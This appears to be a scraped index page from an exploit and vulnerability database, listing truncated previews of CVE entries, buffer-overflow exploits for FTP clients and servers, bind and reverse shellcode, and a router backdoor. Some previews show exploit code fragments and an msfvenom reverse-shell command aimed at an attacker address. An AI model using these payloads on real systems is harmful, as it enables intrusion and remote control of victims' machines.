EUVD-2026-26356

When exchanging data over a socket, libnv uses select2 to wait for data to arrive. However, it does not verify whether the provided socket descriptor fits in select2's file descriptor set size limit of FDSETSIZE 1024. An attacker who is able to force a libnv application to allocate large file...

CVE-2026-39457

When exchanging data over a socket, libnv uses select2 to wait for data to arrive. However, it does not verify whether the provided socket descriptor fits in select2's file descriptor set size limit of FDSETSIZE 1024. An attacker who is able to force a libnv application to allocate large file...

CVE-2023-52527 ipv4, ipv6: Fix handling of transhdrlen in __ip{,6}_append_data()

In the Linux kernel, the following vulnerability has been resolved: ipv4, ipv6: Fix handling of transhdrlen in ip,6appenddata Including the transhdrlen in length is a problem when the packet is partially filled e.g. something like sendMSGMORE happened previously when appending to an IPv4 or IPv6...

Linux Network Project Buffer Overflow Vulnerability

Linux Network Project is an open source remote terminal management system that uses C in combination with Linux features for socket programming. Linux Network Project has a buffer error vulnerability in version 1.0, which stems from the product's password field failing to properly control memory...

TP-Link Archer C50 3 - Denial of Service Exploit

Exploit Title: TP-Link Archer C50 3 - Denial of Service PoC Exploit Author: thewhiteh4t Vendor Homepage: https://www.tp-link.com/ Version: TP-Link Archer C50 v3 Build 171227 Tested on: Arch Linux x64 CVE: CVE-2020-9375 Description:...

FTPShell Client 5.22 Remote Buffer Overflow Exploit

Exploit for windows platform in category remote exploits !/usr/bin/python Exploit Title : FTPShell Client 5.22 - Remote Buffer Overflow Discovery by : Shubham Singh Known As : Spirited Wolf Twitter: @Pwsecspirit Email : email protected Youtube Channel : www.youtube.com/c/Pentestingwithspirit...

Exim base64d Remote Code Execution

!/usr/bin/python import time import socket import struct s = None f = None def logo: print print " CVE-2018-6789 Poc Exploit" print "@straightblast ; [email protected]" print def connecthost, port: global s global f s = socket.createconnectionhost,port f = s.makefile'rw', bufsize=0 def p...

Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)

global start start: ; sock = socketAFINET, SOCKSTREAM, 0 ; AFINET = 2 ; SOCKSTREAM = 1 ; syscall number 41 push 41 pop rax push 2 pop rdi push 1 pop rsi cdq syscall ; copy socket descriptor to rdi for future use xchg rdi,rax ; server.sinfamily = AFINET ; server.sinport = htonsPORT ;...

HP iMC Plat 7.2 - Remote Code Execution (2)

!/opt/local/bin/python2.7 Exploit Title: HP iMC Plat 7.2 dbman Opcode 10008 Command Injection RCE Date: 11-29-2017 Exploit Author: Chris Lyne @lynerc Vendor Homepage: www.hpe.com Software Link:...

Disk Pulse Enterprise 10.0.12 GET Buffer Overflow

Tested on Windows XP SP3 x86 The application requires to have the web server enabled. !/usr/bin/python import socket, threading, struct host = "192.168.228.155" port = 80 def sendegghunterrequest: msfvenom -p windows/meterpreter/reversetcp LHOST=192.168.228.158 LPORT=443 -f py buf =...

127.0.0.1

A remote administration tool a RAT is a piece of software that allows a remote "operator" to control a system as if he has physical access to that system. While desktop sharing and remote administration have many legal uses, "RAT" software is usually associated with criminal or malicious activity...

Tiandy IP Cameras 5.56.17.120 - Sensitive Information Disclosure

Tiandy IP Cameras 5.56.17.120 - Sensitive Information Disclosure Vulnerability Summary The following advisory describes sensitive information Disclosure found in Tiandy IP cameras version 5.56.17.120 Tianjin Tiandy Digital Technology Co., Ltd Tiandy Tech is “one of top 10 leading CCTV manufacture...

Linux/x86 - Bind Shell Shellcode (75 bytes)

Linux/x86 - Bind Shell Shellcode 75 bytes. Shellcode exploit for Linx86 platform / Architecture : x86 OS : Linux Author : wetw0rk ID : SLAE-958 Shellcode Size : 75 bytes Bind Port : 4444 Description : A linux/x86 bind shell via /bin/sh. Created by analysing msfvenom; original payload was 78 bytes...

Linux/x86 - Reverse UDP Shellcode (668 bytes)

Linux/x86 - Reverse UDP Shellcode 668 bytes. Shellcode exploit for Linx86 platform ; SLAE-X ; thanks to writesup from previou students : ; assignment: 2. create a reverse shell ; originality: using UDP instead TCP ; usage : sudo ncat -lup 53 on the receiving end ; warning, this shellcode might...

FTPShell Client 6.53 - Remote Buffer Overflow

FTPShell Client 6.53 - Remote Buffer Overflow Exploit Title: FTPShell Client 6.53 buffer overflow on making initial connection Date: 2017-03-04 Exploit Author: Peter Baris Vendor Homepage: http://www.saptech-erp.com.au Software Link: http://www.ftpshell.com/downloadclient.htm Version: Windows...

Netcore Netis Routers - UDP Backdoor Access

Netcore Netis Routers - UDP Backdoor Access !/usr/bin/python -- coding: utf8 -- NETCORE / NETDIS UDP 53413 BACKDOOR https://netisscan.shadowserver.org/ http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/ https://www.seebug.org/vuldb/ssvid-90227 impor...

Disk Sorter Enterprise 9.1.12 Buffer Overflow

!/usr/bin/python print "Disk Sorter Enterprise 9.1.12 Login Buffer Overflow" print "Author: Tulpa / tulpaattulpa-securitydotcom" Author website: www.tulpa-security.com Author twitter: @tulpasecurity Exploit will land you NT AUTHORITY\SYSTEM You do not need to be authenticated, password below is...

Freefloat FTP Server 1.0 - SITE ZONE Remote Buffer Overflow

Freefloat FTP Server 1.0 - SITE ZONE Remote Buffer Overflow !/usr/bin/env python -- coding: utf-8 -- Exploit Title: FreeFloat FTP Server BoF SITE ZONE Command Date: 04/11/2016 Exploit Author: Luis Noriega Software Link: http://www.freefloat.com/software/freefloatftpserver.zip Version: 1.0 Tested...

PCMan FTP Server 2.0.7 - 'PORT' Remote Buffer Overflow

!/usr/bin/env python -- coding: utf-8 -- Exploit Title: PCMan FTP Server 2.0 PORT Command BoF Exploit Author: Pablo González Date: 4/11/2016 Software: PCMan 2.0 Tested on: Windows XP Profesional SP3 Spanish x86 import socket print "Creating malicious input!" junk = '\x41'2007 ret="\xf7\x56\x3c\x7...

PCMan FTP Server 2.0.7 - 'UMASK' Command Buffer Overflow Exploit

Exploit for windows platform in category remote exploits !/usr/bin/env python -- coding: utf-8 -- Exploit Title: PCMan's FTP Server 2.0.7 UMASK Command Buffer Overflow Exploit Date: 1/11/2016 Exploit Author: Eagleblack Tested on: Windows XP Profesional SP3 Spanish version x86 CVE : N/A import...